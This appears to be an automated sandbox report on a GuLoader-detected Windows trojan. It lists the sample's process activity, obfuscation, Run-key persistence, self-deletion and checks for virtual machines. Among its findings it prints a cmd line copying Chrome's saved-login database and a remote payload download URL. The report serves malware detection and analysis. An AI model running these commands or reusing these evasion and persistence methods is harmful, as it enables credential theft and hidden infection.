Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_00563E0E NtProtectVirtualMemory,		30_2_00563E0E

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\explorer.exe	Process Stats: CPU usage > 98%
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: Zr26f1rL6r.exe, 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000000.47306458832.0000000000422000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000003.47933945787.00000000008FF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47938539485.00000000000DC000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47954454517.000000001EB60000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
Source: Zr26f1rL6r.exe	Binary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: edgegdi.dll

PE / OLE file has an invalid certificate

Source: Zr26f1rL6r.exe

Static PE information: invalid certificate

Sample is known by Antivirus

Source: Zr26f1rL6r.exe	Virustotal: Detection: 40%
Source: Zr26f1rL6r.exe	ReversingLabs: Detection: 20%

PE file has an executable .text section and no other executable section

Source: Zr26f1rL6r.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Creates temporary files

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

File created: C:\Users\user\AppData\Local\Temp\~DFBF74AAE9E8A330D2.TMP

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/6@68/14

Reads ini files

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_004093B3 push ebx; ret		2_2_004093B4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02313800 push 4674B5B4h; retf		2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312286 push esi; retf		2_2_02312228
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814 pushfd ; retf		2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814 push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02313841 push 4674B5B4h; retf		2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02310047 push ds; ret		2_2_02310051
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02310047 push ds; ret		2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023138B3 push 4674B5B4h; retf		2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231388E push 4674B5B4h; retf		2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023158DF pushfd ; retf		2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023160C4 pushfd ; iretd		2_2_023160C7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023138CA push 4674B5B4h; retf		2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315919 push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02311918 push esi; ret		2_2_0231192F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231010F push ds; ret		2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231590E pushfd ; retf		2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231597F push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312954 pushad ; ret		2_2_02312955
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023159A2 push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023159AE push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315996 push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231598A push ebx; retf		2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02314DAC push ecx; ret		2_2_02314DAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C08CD push ecx; mov dword ptr [esp], ecx		10_2_1E8C08D6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F15 push edi; ret		10_2_00573F18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F11 push edi; ret		10_2_00573F14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F1D push edi; ret		10_2_00573F20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F19 push edi; ret		10_2_00573F1C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F0D push edi; ret		10_2_00573F10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F21 push edi; ret		10_2_00573F24

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe

Jump to dropped file

Contains functionality to read ini properties file for application configuration

Source: C:\Program Files\Mozilla Firefox\firefox.exe

Code function: 25_2_000001BF400004B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,

25_2_000001BF400004B2

Boot Survival:

Creates an autostart registry key

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://ATSEASONALS.COM/GHRTT/BIN_KBJOEPXZ175.BIN
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 7852

Thread sleep time: -165000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_0232045A rdtsc

2_2_0232045A

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	API coverage: 1.1 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 2.8 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %

Queries a list of all running processes

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA89

Queries a list of all running drivers

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

System information queried: ModuleInformation

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW8
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
